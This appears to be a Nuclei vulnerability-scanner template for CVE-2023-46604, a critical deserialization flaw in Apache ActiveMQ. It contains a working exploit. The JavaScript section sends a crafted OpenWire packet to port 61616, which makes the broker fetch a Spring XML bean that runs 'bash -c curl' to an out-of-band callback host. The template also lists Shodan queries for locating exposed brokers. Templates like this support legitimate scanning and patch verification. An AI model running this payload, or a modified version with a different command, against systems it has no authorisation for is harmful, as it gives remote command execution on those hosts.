id: CVE-2023-46604

info:
  name: Apache ActiveMQ - Remote Code Execution
  author: Ice3man,Mzack9999,pdresearch
  severity: critical
  description: |
    Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.
    Users are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.
  reference:
    - http://www.openwall.com/lists/oss-security/2023/10/27/5
    - https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt
    - https://github.com/X1r0z/ActiveMQ-RCE
    - https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis?referrer=etrblog
    - https://paper.seebug.org/3058/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-46604
    cwe-id: CWE-502
    epss-score: 0.97273
    epss-percentile: 0.99837
    cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: activemq
    shodan-query:
      - product:"ActiveMQ OpenWire Transport"
      - cpe:"cpe:2.3:a:apache:activemq"
      - product:"activemq openwire transport"
  tags: cve,cve2023,network,rce,apache,activemq,deserialization,js,kev
variables:
  prefix: "1f00000000000000000001010042"
  classname: "6f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401"
  final: "{{prefix}}{{classname}}"

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      let m1 = require('nuclei/net');
      let m2 = require('nuclei/bytes');
      let b = m2.Buffer();
      let name=Host+':'+Port;
      let conn = m1.Open('tcp', name);
      let randomvar = '{{randstr}}'.toLowerCase();
      var Base64={encode: btoa}
      exploit_xml=`http://${oob}/b64_body:`+Base64.encode('<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg> <list value-type="java.lang.String"><value>bash</value><value>-c</value><value>curl http://$(echo '+randomvar+').'+oob+'</value> </list> </constructor-arg> <property name="whatever" value="#{ pb.start() }"/> </bean></beans>') +'/'
      packet="00000001100000006401010100436f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e46696c6553797374656d586d6c4170706c69636174696f6e436f6e74657874010"
      packet+=(exploit_xml.length).toString(16)
      packet+=(b.WriteString(exploit_xml)).Hex()
      conn.SendHex(packet);
      resp = conn.RecvString()
      randomvar

    args:
      Host: "{{Host}}"
      Port: "61616"
      oob: "{{interactsh-url}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(interactsh_request, response)'
        condition: and
# digest: 4b0a00483046022100a561894c748437dfc21d9f751262302cd1f04eb3b75eb625dbac3aa4a625f8ba022100bb13779e8ed570a786808de9e2ce24a0699e0b6d4bb8cc0b9c800da5b8c9f94d:922c64590222798bb761d5b6d8e72950